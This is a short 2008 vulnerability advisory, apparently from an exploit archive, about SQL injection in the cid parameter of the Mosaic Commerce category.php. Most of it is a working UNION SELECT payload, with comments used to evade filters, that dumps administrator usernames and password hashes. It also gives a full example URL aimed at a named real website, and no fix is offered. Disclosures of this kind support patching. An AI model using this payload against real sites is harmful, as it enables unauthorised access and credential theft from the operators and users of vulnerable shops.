Mosaic Commerce (category.php cid) SQL Injection Vulnerability

2008-10-16 19:01:04

Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )


{SQL BUG}
/mosaic-path/category.php?cid=[SQL]

Exploit For Get Admin Username And Password Hash:
category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*


Example:

http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.